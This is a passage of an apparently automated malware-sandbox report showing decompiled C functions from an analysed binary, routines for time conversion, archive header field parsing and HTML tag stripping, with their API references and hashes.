Instruction Fuzzy Hash: AF4143B1901259A6DF21FBA0CD45EDFB37CAF55340F4048A5B649E3051EBB89BCD8B60

Uniqueness

Uniqueness Score: -1.00%

Function 00A41218 Relevance: 12.1, APIs: 8, Instructions: 125
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00A41218(intOrPtr* __ecx, long __edx, void* __ebp, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				intOrPtr* _v68;
				struct _FILETIME _v76;
				intOrPtr _v80;
				signed int _t78;
				long _t82;
				signed int _t87;
				signed int _t92;
				void* _t93;
				long _t94;
				signed int _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				signed int* _t99;
				void* _t100;
				signed int _t101;

				_t100 = __ebp;
				_t94 = __edx;
				_t97 = __ecx;
				_v68 = __ecx;
				_v80 = E00A4F1E0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76.dwLowDateTime = _t94;
				if(E00A3B146() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v76);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v76.dwLowDateTime = 0 - _v56.dwLowDateTime + _v76.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v76.dwHighDateTime = _v76.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v76);
				}
				_push(_t100);
				FileTimeToSystemTime( &_v76,  &_v48);
				_t99 = _a4;
				_t92 = _v48.wDay & 0x0000ffff;
				_t101 = _v48.wMonth & 0x0000ffff;
				_t95 = _v48.wYear & 0x0000ffff;
				_t99[3] = _v48.wHour & 0x0000ffff;
				_t87 = _t92 - 1;
				_t99[4] = _v48.wMinute & 0x0000ffff;
				_t99[5] = _v48.wSecond & 0x0000ffff;
				_t99[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t99 = _v48.wYear & 0x0000ffff;
				_t99[1] = _t101;
				_t99[2] = _t92;
				_t99[8] = _t87;
				_v76.dwLowDateTime = 1;
				if(_t101 > 1) {
					_t96 = _t87;
					_t98 = 0xa6e1a8;
					_t93 = 4;
					while(1) {
						_t87 = _t96;
						if(_t93 > 0x30) {
							break;
						}
						_t93 = _t93 + 4;
						_t87 =  *_t98 + _t96;
						_t82 = _v76.dwLowDateTime + 1;
						_t99[8] = _t87;
						_t98 = _t98 + 4;
						_v76.dwLowDateTime = _t82;
						_t96 = _t87;
						if(_t82 < _t101) {
							continue;
						}
						break;
					}
					_t97 = _v68;
					_t95 = _v48.wYear & 0x0000ffff;
				}
				if(_t101 > 2 && E00A413A4(_t95) != 0) {
					_t99[8] = _t87 + 1;
				}
				_t78 = E00A4F250( *_t97,  *((intOrPtr*)(_t97 + 4)), 0x3b9aca00, 0);
				_t99[6] = _t78;
				return _t78;
			}

0x00a41218
0x00a41218
0x00a4121e
0x00a41225
0x00a41233
0x00a41237
0x00a41245
0x00a41263
0x00a41274
0x00a41284
0x00a41294
0x00a412a6
0x00a412ae
0x00a412b4
0x00a412ba
0x00a412be
0x00a412c0
0x00a41247
0x00a41251
0x00a41251
0x00a412c4
0x00a412cf
0x00a412d5
0x00a412de
0x00a412e3
0x00a412e8
0x00a412ed
0x00a412f5
0x00a412f8
0x00a41300
0x00a41308
0x00a4130e
0x00a41310
0x00a41313
0x00a41316
0x00a41319
0x00a4131f
0x00a41323
0x00a41325
0x00a4132a
0x00a4132b
0x00a4132b
0x00a41330
0x00000000
0x00000000
0x00a41334
0x00a4133b
0x00a4133d
0x00a4133e
0x00a41341
0x00a41344
0x00a41348
0x00a4134c
0x00000000
0x00000000
0x00000000
0x00a4134c
0x00a4134e
0x00a41352
0x00a41352
0x00a4135b
0x00a4136a
0x00a4136a
0x00a41379
0x00a4137f
0x00a41387

APIs

__aulldiv.LIBCMT ref: 00A4122E

Part of subcall function 00A3B146: GetVersionExW.KERNEL32(?), ref: 00A3B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00A41251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00A41263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A41274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A41294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00A412CF
__aullrem.LIBCMT ref: 00A41379

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: ce3b28ac6c1681da0f1fd1573ac39405659279cd44afb9ff3c1f662c82dd3337
Instruction ID: b2adef0ce2365c79ffccf912c2ffa46761cd05246743b0d65aacffa489cb6a2c
Opcode Fuzzy Hash: ce3b28ac6c1681da0f1fd1573ac39405659279cd44afb9ff3c1f662c82dd3337
Instruction Fuzzy Hash: 204128B6508305AFC750DF65C88496BBBF9FF88314F008A2EF596C6610E774E649CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A32210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00A32210(intOrPtr __ecx, signed int __edx, signed char _a3, signed char _a4, signed int _a5, signed int _a6, signed int _a7, signed char _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, char _a28, char _a36, char _a48, char _a52, char _a160, char _a172, intOrPtr _a8368, intOrPtr _a8372, intOrPtr _a8376) {
				char _v4;
				signed char _v5;
				char _v12;
				char _v16;
				signed char _t135;
				char _t138;
				signed int _t140;
				unsigned int _t141;
				signed int _t145;
				signed int _t162;
				signed int _t165;
				signed int _t176;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed int _t183;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				signed char _t221;
				signed char _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr _t240;
				signed char _t244;
				intOrPtr _t247;
				signed char _t248;
				signed char _t263;
				signed int _t264;
				signed int _t266;
				intOrPtr _t273;
				intOrPtr _t276;
				intOrPtr _t279;
				intOrPtr _t306;
				intOrPtr _t311;
				signed int _t313;
				intOrPtr _t315;
				signed char _t318;
				char _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				intOrPtr* _t334;
				signed int _t337;
				signed int _t338;
				intOrPtr _t340;
				void* _t341;
				signed int _t345;
				signed int _t348;
				signed int _t361;

				_t313 = __edx;
				E00A4EC50(0x20ac);
				_t315 = _a8368;
				_a12 = __ecx;
				_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _a8372;
				if(_t135 <  *(_t315 + 0x1c)) {
					L96:
					return _t135;
				}
				 *(_t315 + 0x1c) = _t135;
				if(_a8372 >= 2) {
					_t240 = _a8376;
					while(1) {
						_t135 = E00A3CCFB();
						_t244 = _t135;
						_t345 = _t313;
						if(_t345 < 0 || _t345 <= 0 && _t244 == 0) {
							break;
						}
						_t318 =  *(_t315 + 0x1c);
						_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t318;
						if(_t135 == 0) {
							break;
						}
						_t348 = _t313;
						if(_t348 > 0 || _t348 >= 0 && _t244 > _t135) {
							break;
						} else {
							_a8 = _t318 + _t244;
							_t138 = E00A3CCFB();
							_t337 = _t313;
							_t319 = _t138;
							_t313 = _a8;
							_t247 = _t313 -  *(_t315 + 0x1c);
							_a20 = _t247;
							if( *((intOrPtr*)(_t240 + 4)) == 1 && _t319 == 1 && _t337 == 0) {
								 *((char*)(_t240 + 0x1e)) = _t138;
								_t234 = E00A3CCFB();
								_a16 = _t234;
								if((_t234 & 0x00000001) != 0) {
									_t237 = E00A3CCFB();
									if((_t237 | _t313) != 0) {
										_t311 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x20)) = _t237 +  *((intOrPtr*)(_t311 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)(_t311 + 0x6cbc));
									}
									_t234 = _a16;
								}
								if((_t234 & 0x00000002) != 0) {
									_t235 = E00A3CCFB();
									if((_t235 | _t313) != 0) {
										_t306 = _a12;
										asm("adc ecx, edx");
										 *((intOrPtr*)(_t240 + 0x30)) = _t235 +  *((intOrPtr*)(_t306 + 0x6cb8));
										 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)(_t306 + 0x6cbc));
									}
								}
								_t247 = _a20;
								_t313 = _a8;
							}
							if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
								_t361 = _t337;
								if(_t361 > 0 || _t361 >= 0 && _t319 > 7) {
									goto L94;
								} else {
									_t320 = _t319 - 1;
									if(_t320 == 0) {
										_t140 = E00A3CCFB();
										__eflags = _t140;
										if(_t140 == 0) {
											_t141 = E00A3CCFB();
											 *(_t240 + 0x10c1) = _t141 & 0x00000001;
											 *(_t240 + 0x10ca) = _t141 >> 0x00000001 & 0x00000001;
											_t145 = E00A3CBAF(_t315) & 0x000000ff;
											 *(_t240 + 0x10ec) = _t145;
											__eflags = _t145 - 0x18;
											if(_t145 > 0x18) {
												E00A34092( &_a28, 0x14, L"xc%u", _t145);
												_t341 = _t341 + 0x10;
												E00A3403D(_a12, _t240 + 0x28,  &_a28);
											}
											E00A3CC5D(_t315, _t240 + 0x10a1, 0x10);
											E00A3CC5D(_t315, _t240 + 0x10b1, 0x10);
											__eflags =  *(_t240 + 0x10c1);
											if( *(_t240 + 0x10c1) != 0) {
												_t321 = _t240 + 0x10c2;
												E00A3CC5D(_t315, _t321, 8);
												E00A3CC5D(_t315,  &_a16, 4);
												E00A40016( &_a52);
												_push(8);
												_push(_t321);
												_push( &_a48);
												E00A4005C();
												_push( &_v4);
												E00A3FF33( &_a36);
												_t162 = E00A50C4A( &_v16,  &_v12, 4);
												_t341 = _t341 + 0xc;
												asm("sbb al, al");
												__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
												 *(_t240 + 0x10c1) =  ~_t162 + 1;
												if( *((intOrPtr*)(_t240 + 4)) == 3) {
													_t165 = E00A50C4A(_t321, 0xa636a8, 8);
													_t341 = _t341 + 0xc;
													__eflags = _t165;
													if(_t165 == 0) {
														 *(_t240 + 0x10c1) = _t165;
													}
												}
											}
											 *((char*)(_t240 + 0x10a0)) = 1;
											 *((intOrPtr*)(_t240 + 0x109c)) = 5;
											 *((char*)(_t240 + 0x109b)) = 1;
										} else {
											E00A34092( &_a28, 0x14, L"x%u", _t140);
											_t341 = _t341 + 0x10;
											E00A3403D(_a12, _t240 + 0x28,  &_a28);
										}
										goto L94;
									}
									_t322 = _t320 - 1;
									if(_t322 == 0) {
										_t176 = E00A3CCFB();
										__eflags = _t176;
										if(_t176 != 0) {
											goto L94;
										}
										_push(0x20);
										 *((intOrPtr*)(_t240 + 0x1070)) = 3;
										_push(_t240 + 0x1074);
										L37:
										E00A3CC5D(_t315);
										goto L94;
									}
									_t323 = _t322 - 1;
									if(_t323 == 0) {
										__eflags = _t247 - 5;
										if(_t247 < 5) {
											goto L94;
										}
										_t179 = E00A3CCFB();
										_a3 = _t179;
										_t180 = _t179 & 0x00000001;
										_t263 = _a3;
										_a4 = _t180;
										_t313 = _t263 & 0x00000002;
										__eflags = _t313;
										_a5 = _t313;
										if(_t313 != 0) {
											_t279 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E00A415BB(_t240 + 0x1040, E00A3CC3D(_t279, __eflags), _t313);
											} else {
												E00A4158F(_t240 + 0x1040, E00A3CBFB(_t279), 0);
											}
											_t263 = _a3;
											_t180 = _a4;
										}
										_t264 = _t263 & 0x00000004;
										__eflags = _t264;
										_a6 = _t264;
										if(_t264 != 0) {
											_t326 = _t240 + 0x1048;
											_t276 = _t315;
											__eflags = _t180;
											if(__eflags == 0) {
												E00A415BB(_t326, E00A3CC3D(_t276, __eflags), _t313);
											} else {
												E00A4158F(_t326, E00A3CBFB(_t276), 0);
											}
										}
										_t181 = _a3;
										_t266 = _t181 & 0x00000008;
										__eflags = _t266;
										_a7 = _t266;
										if(_t266 == 0) {
											__eflags = _a4;
											if(_a4 == 0) {
												goto L94;
											}
											goto L72;
										} else {
											__eflags = _a4;
											_t325 = _t240 + 0x1050;
											_t273 = _t315;
											if(__eflags == 0) {
												E00A415BB(_t325, E00A3CC3D(_t273, __eflags), _t313);
												goto L94;
											}
											E00A4158F(_t325, E00A3CBFB(_t273), 0);
											_t181 = _v5;
											L72:
											__eflags = _t181 & 0x00000010;
											if((_t181 & 0x00000010) != 0) {
												__eflags = _a5;
												if(_a5 == 0) {
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
												} else {
													_t188 = E00A3CBFB(_t315);
													_t338 = 0x3fffffff;
													_t324 = 0x3b9aca00;
													_t189 = _t188 & 0x3fffffff;
													__eflags = _t189 - 0x3b9aca00;
													if(_t189 < 0x3b9aca00) {
														E00A41208(_t240 + 0x1040, _t189, 0);
													}
												}
												__eflags = _a6;
												if(_a6 != 0) {
													_t186 = E00A3CBFB(_t315) & _t338;
													__eflags = _t186 - _t324;
													if(_t186 < _t324) {
														E00A41208(_t240 + 0x1048, _t186, 0);
													}
												}
												__eflags = _a7;
												if(_a7 != 0) {
													_t183 = E00A3CBFB(_t315) & _t338;
													__eflags = _t183 - _t324;
													if(_t183 < _t324) {
														E00A41208(_t240 + 0x1050, _t183, 0);
													}
												}
											}
											goto L94;
										}
									}
									_t327 = _t323 - 1;
									if(_t327 == 0) {
										__eflags = _t247 - 1;
										if(_t247 >= 1) {
											E00A3CCFB();
											__eflags = E00A3CCFB();
											if(__eflags != 0) {
												 *((char*)(_t240 + 0x10f3)) = 1;
												E00A34092( &_a28, 0x14, L";%u", _t204);
												_t341 = _t341 + 0x10;
												E00A405DA(__eflags, _t240 + 0x28,  &_a28, 0x800);
											}
										}
										goto L94;
									}
									_t328 = _t327 - 1;
									if(_t328 == 0) {
										 *((intOrPtr*)(_t240 + 0x1100)) = E00A3CCFB();
										 *(_t240 + 0x2104) = E00A3CCFB() & 0x00000001;
										_t329 = E00A3CCFB();
										_a172 = 0;
										__eflags = _t329 - 0x1fff;
										if(_t329 < 0x1fff) {
											E00A3CC5D(_t315,  &_a172, _t329);
											 *((char*)(_t341 + _t329 + 0xbc)) = 0;
										}
										E00A3C335( &_a172,  &_a172, 0x2000);
										_push(0x800);
										_push(_t240 + 0x1104);
										_push( &_a160);
										E00A41C3B();
										goto L94;
									}
									_t330 = _t328 - 1;
									if(_t330 == 0) {
										_t221 = E00A3CCFB();
										_a16 = _t221;
										_t339 = _t240 + 0x2108;
										 *(_t240 + 0x2106) = _t221 >> 0x00000002 & 0x00000001;
										 *(_t240 + 0x2107) = _t221 >> 0x00000003 & 0x00000001;
										 *((char*)(_t240 + 0x2208)) = 0;
										 *((char*)(_t240 + 0x2108)) = 0;
										__eflags = _t221 & 0x00000001;
										if((_t221 & 0x00000001) != 0) {
											_t332 = E00A3CCFB();
											__eflags = _t332 - 0xff;
											if(_t332 >= 0xff) {
												_t332 = 0xff;
											}
											E00A3CC5D(_t315, _t339, _t332);
											_t221 = _a8;
											 *((char*)(_t332 + _t240 + 0x2108)) = 0;
										}
										__eflags = _t221 & 0x00000002;
										if((_t221 & 0x00000002) != 0) {
											_t331 = E00A3CCFB();
											__eflags = _t331 - 0xff;
											if(_t331 >= 0xff) {
												_t331 = 0xff;
											}
											E00A3CC5D(_t315, _t240 + 0x2208, _t331);
											 *((char*)(_t331 + _t240 + 0x2208)) = 0;
										}
										__eflags =  *(_t240 + 0x2106);
										if( *(_t240 + 0x2106) != 0) {
											 *((intOrPtr*)(_t240 + 0x2308)) = E00A3CCFB();
										}
										__eflags =  *(_t240 + 0x2107);
										if( *(_t240 + 0x2107) != 0) {
											 *((intOrPtr*)(_t240 + 0x230c)) = E00A3CCFB();
										}
										 *((char*)(_t240 + 0x2105)) = 1;
										goto L94;
									}
									if(_t330 != 1) {
										goto L94;
									}
									_t340 = _t247;
									if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t315 + 0x18)) - _t313 == 1) {
										_t340 = _t247 + 1;
									}
									_t334 = _t240 + 0x1028;
									E00A320BD(_t334, _t340);
									_push(_t340);
									_push( *_t334);
									goto L37;
								}
							} else {
								L94:
								_t248 = _a8;
								 *(_t315 + 0x1c) = _t248;
								_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t248;
								if(_t135 >= 2) {
									continue;
								}
								break;
							}
						}
					}
				}
			}

0x00a32210
0x00a32215
0x00a3221b
0x00a32222
0x00a32229
0x00a32233
0x00a32862
0x00a32868
0x00a32868
0x00a32241
0x00a32244
0x00a3224b
0x00a32254
0x00a32256
0x00a3225b
0x00a3225d
0x00a3225f
0x00000000
0x00000000
0x00a32272
0x00a32275
0x00a32277
0x00000000
0x00000000
0x00a3227d
0x00a3227f
0x00000000
0x00a3228f
0x00a32294
0x00a32298
0x00a3229d
0x00a3229f
0x00a322a1
0x00a322a7
0x00a322ae
0x00a322b2
0x00a322bf
0x00a322c2
0x00a322c7
0x00a322cd
0x00a322d1
0x00a322da
0x00a322dc
0x00a322ec
0x00a322ee
0x00a322f1
0x00a322f1
0x00a322f4
0x00a322f4
0x00a322fa
0x00a322fe
0x00a32307
0x00a32309
0x00a32319
0x00a3231b
0x00a3231e
0x00a3231e
0x00a32307
0x00a32321
0x00a32325
0x00a32325
0x00a3232d
0x00a32339
0x00a3233b
0x00000000
0x00a3234c
0x00a3234c
0x00a3234f
0x00a326f3
0x00a326f8
0x00a326fa
0x00a3272a
0x00a32738
0x00a32740
0x00a3274b
0x00a3274e
0x00a32754
0x00a32757
0x00a32766
0x00a32773
0x00a3277b
0x00a3277b
0x00a3278b
0x00a3279b
0x00a327a0
0x00a327a7
0x00a327af
0x00a327b8
0x00a327c6
0x00a327d0
0x00a327d5
0x00a327d7
0x00a327dc
0x00a327dd
0x00a327e6
0x00a327ec
0x00a327fd
0x00a32802
0x00a32807
0x00a3280b
0x00a3280f
0x00a32815
0x00a3281f
0x00a32824
0x00a32827
0x00a32829
0x00a3282b
0x00a3282b
0x00a32829
0x00a32815
0x00a32831
0x00a32838
0x00a32842
0x00a326fc
0x00a32709
0x00a32716
0x00a3271e
0x00a3271e
0x00000000
0x00a326fa
0x00a32355
0x00a32358
0x00a326cc
0x00a326d1
0x00a326d3
0x00000000
0x00000000
0x00a326d9
0x00a326e1
0x00a326eb
0x00a323ad
0x00a323af
0x00000000
0x00a323af
0x00a3235e
0x00a32361
0x00a32556
0x00a32559
0x00000000
0x00000000
0x00a32561
0x00a32566
0x00a3256a
0x00a3256c
0x00a32572
0x00a32576
0x00a32576
0x00a32579
0x00a3257d
0x00a3257f
0x00a32581
0x00a32583
0x00a325a7
0x00a32585
0x00a32593
0x00a32593
0x00a325ac
0x00a325b0
0x00a325b0
0x00a325b4
0x00a325b4
0x00a325b7
0x00a325bb
0x00a325bd
0x00a325c3
0x00a325c5
0x00a325c7
0x00a325e3
0x00a325c9
0x00a325d3
0x00a325d3
0x00a325c7
0x00a325e8
0x00a325ee
0x00a325ee
0x00a325f1
0x00a325f5
0x00a3262e
0x00a32633
0x00000000
0x00000000
0x00000000
0x00a325f7
0x00a325f7
0x00a325fc
0x00a32602
0x00a32604
0x00a32624
0x00000000
0x00a32624
0x00a32610
0x00a32615
0x00a32639
0x00a32639
0x00a3263b
0x00a32641
0x00a32646
0x00a3266f
0x00a32674
0x00a32648
0x00a3264a
0x00a3264f
0x00a32654
0x00a32659
0x00a3265b
0x00a3265d
0x00a32668
0x00a32668
0x00a3265d
0x00a32679
0x00a3267e
0x00a32687
0x00a32689
0x00a3268b
0x00a32696
0x00a32696
0x00a3268b
0x00a3269b
0x00a326a0
0x00a326ad
0x00a326af
0x00a326b1
0x00a326c0
0x00a326c0
0x00a326b1
0x00a326a0
0x00000000
0x00a3263b
0x00a325f5
0x00a32367
0x00a3236a
0x00a32503
0x00a32506
0x00a3250e
0x00a3251a
0x00a3251c
0x00a3252c
0x00a32536
0x00a3253b
0x00a3254c
0x00a3254c
0x00a3251c
0x00000000
0x00a32506
0x00a32370
0x00a32373
0x00a3248e
0x00a3249d
0x00a324a8
0x00a324aa
0x00a324b2
0x00a324b8
0x00a324c5
0x00a324ca
0x00a324ca
0x00a324e0
0x00a324e5
0x00a324f0
0x00a324f8
0x00a324f9
0x00000000
0x00a324f9
0x00a32379
0x00a3237c
0x00a323bb
0x00a323c2
0x00a323c9
0x00a323d2
0x00a323e0
0x00a323e6
0x00a323ed
0x00a323f1
0x00a323f3
0x00a323fc
0x00a32403
0x00a32405
0x00a32407
0x00a32407
0x00a3240d
0x00a32412
0x00a32416
0x00a32416
0x00a3241e
0x00a32420
0x00a32429
0x00a32430
0x00a32432
0x00a32434
0x00a32434
0x00a32440
0x00a32445
0x00a32445
0x00a3244d
0x00a32454
0x00a3245d
0x00a3245d
0x00a32463
0x00a3246a
0x00a32473
0x00a32473
0x00a32479
0x00000000
0x00a32479
0x00a32381
0x00000000
0x00000000
0x00a3238b
0x00a3238d
0x00a32399
0x00a32399
0x00a3239c
0x00a323a5
0x00a323aa
0x00a323ab
0x00000000
0x00a323ab
0x00a32849
0x00a32849
0x00a32849
0x00a3284d
0x00a32853
0x00a32858
0x00000000
0x00000000
0x00000000
0x00a32858
0x00a3232d
0x00a3227f
0x00a32860

APIs

_swprintf.LIBCMT ref: 00A32536

Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5

Part of subcall function 00A405DA: _wcslen.LIBCMT ref: 00A405E0

Strings

;%u, xrefs: 00A32523
x%u, xrefs: 00A326FD
xc%u, xrefs: 00A3275A

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 5a5282a0cc9067fdaf17e1c2bd7c9428d9c948d2ae499af69f607b4c27a030d5
Instruction ID: 95f9e8c4aa665e7391f62f0b3fa026c8342747dad85e6a4311bb601dece24214
Opcode Fuzzy Hash: 5a5282a0cc9067fdaf17e1c2bd7c9428d9c948d2ae499af69f607b4c27a030d5
Instruction Fuzzy Hash: 06F12A706083409BDB25DF3889D6BFE77996F94300F08057DFD86AB283CB649945C762

Uniqueness

Uniqueness Score: -1.00%

Function 00A49CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A49CFE(void* __eflags, signed short* _a4) {
				signed int* _v4;
				intOrPtr _v8;
				void* __ecx;
				signed int* _t17;
				signed int _t18;
				void* _t21;
				void* _t22;
				void* _t24;
				signed short _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed short* _t29;
				void* _t30;
				signed int _t31;
				signed int _t32;
				void* _t33;
				signed int _t36;
				void* _t38;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed short _t45;
				signed int _t47;
				short _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed short* _t53;
				signed int* _t55;
				short* _t56;
				short* _t57;
				signed short* _t58;
				signed int* _t59;
				intOrPtr _t60;
				signed int* _t77;

				_t58 = _a4;
				_push(2 + E00A53E13(_t58) * 2);
				_t17 = E00A53E33(_t38);
				_t59 = _t17;
				_v4 = _t59;
				if(_t59 == 0) {
					return _t17;
				}
				_t18 = E00A495AA(_t58);
				_t42 =  *_t58 & 0x0000ffff;
				_t36 = _t18;
				_t55 = _t59;
				if(_t42 == 0) {
					L47:
					return _t59;
				} else {
					_push(0xd);
					_push(0x20);
					_v8 = 0x3e;
					do {
						_t43 = _t42 & 0x0000ffff;
						while(_t43 != 0x3c) {
							if(_t36 == 0) {
								L11:
								_t36 = 0;
								__eflags = 0;
								if(0 == 0) {
									L20:
									_t27 =  *_t58 & 0x0000ffff;
									__eflags = _t27;
									if(__eflags == 0) {
										L27:
										_t28 =  *_t58 & 0x0000ffff;
										_t52 = 0x20;
										_t43 = _t28;
										_t72 = _t28;
										_t26 = 0xd;
										if(_t28 != 0) {
											continue;
										}
										break;
									}
									__eflags = _t27 - _t52;
									if(__eflags != 0) {
										L24:
										 *_t55 = _t27;
										L25:
										_t55 =  &(_t55[0]);
										L26:
										_t58 =  &(_t58[1]);
										goto L27;
									}
									__eflags = _t55 - _t59;
									if(__eflags == 0) {
										goto L24;
									}
									__eflags =  *((intOrPtr*)(_t55 - 2)) - _t52;
									if(__eflags == 0) {
										goto L26;
									}
									goto L24;
								}
								__eflags = _t43 - 0x26;
								if(_t43 != 0x26) {
									goto L20;
								}
								_t29 = 0;
								__eflags = 0;
								do {
									_t53 = _t29 + _t58;
									_t47 =  *_t53 & 0x0000ffff;
									__eflags = _t47;
									if(_t47 == 0) {
										break;
									}
									__eflags = _t47 - 0x3b;
									if(_t47 == 0x3b) {
										_t8 =  &(_t53[1]); // 0x22
										_t58 = _t8;
										_t36 = 1;
									}
									_t29 = _t29 + 2;
									__eflags = _t29 - 0x28;
								} while (_t29 < 0x28);
								__eflags = _t36;
								if(__eflags != 0) {
									goto L27;
								}
								_t52 = 0x20;
								goto L20;
							}
							if(_t43 == _t26) {
								L8:
								if(_t55 == _t59 ||  *((intOrPtr*)(_t55 - 2)) != _t52) {
									 *_t55 = _t52;
									goto L25;
								} else {
									goto L26;
								}
							}
							_t30 = 0xa;
							if(_t43 != _t30) {
								goto L11;
							}
							goto L8;
						}
						_t21 = E00A41FDD(_t72, _t58, L"</p>", 4);
						_t36 = _t36 & 0xffffff00 | _t21 == 0x00000000;
						_t74 = _t21;
						if(_t21 == 0 || E00A41FDD(_t74, _t58, L"<br>", 4) == 0) {
							_t44 = 0xd;
							_t22 = 2;
							 *_t55 = _t44;
							_t56 = _t55 + _t22;
							_t49 = 0xa;
							 *_t56 = _t49;
							_t55 = _t56 + _t22;
							if(_t36 != 0) {
								 *_t55 = _t44;
								_t57 = _t55 + _t22;
								 *_t57 = _t49;
								_t55 = _t57 + _t22;
								_t77 = _t55;
							}
						}
						 *_t55 = 0;
						_t24 = E00A41FDD(_t77, _t58, L"<style>", 7);
						_t45 =  *_t58 & 0x0000ffff;
						_t50 = _t45;
						if(_t24 != 0) {
							_t51 = _t45;
							__eflags = _t45;
							if(_t45 == 0) {
								L44:
								_t25 = _t51 & 0x0000ffff;
								__eflags = _t51 - _v8;
								if(__eflags == 0) {
									_t58 =  &(_t58[1]);
									__eflags = _t58;
									_t25 =  *_t58 & 0x0000ffff;
								}
								goto L46;
							}
							_t60 = _v8;
							while(1) {
								_t51 = _t45 & 0x0000ffff;
								__eflags = _t45 - _t60;
								if(_t45 == _t60) {
									break;
								}
								_t58 =  &(_t58[1]);
								_t31 =  *_t58 & 0x0000ffff;
								_t45 = _t31;
								_t51 = _t31;
								__eflags = _t31;
								if(_t31 != 0) {
									continue;
								}
								break;
							}
							_t59 = _v4;
							goto L44;
						} else {
							_t32 = _t50;
							_t79 = _t45;
							if(_t45 == 0) {
								L38:
								_t25 = _t32 & 0x0000ffff;
								goto L46;
							} else {
								goto L34;
							}
							while(1) {
								L34:
								_t33 = E00A41FDD(_t79, _t58, L"</style>", 8);
								_t58 =  &(_t58[1]);
								if(_t33 == 0) {
									break;
								}
								_t32 =  *_t58 & 0x0000ffff;
								if(_t32 != 0) {
									continue;
								}
								goto L38;
							}
							_t58 =  &(_t58[7]);
							__eflags = _t58;
							_t32 =  *_t58 & 0x0000ffff;
							goto L38;
						}
						L46:
						_t52 = 0x20;
						_t42 = _t25 & 0x0000ffff;
						_t26 = 0xd;
					} while (_t25 != 0);
					goto L47;
				}
			}

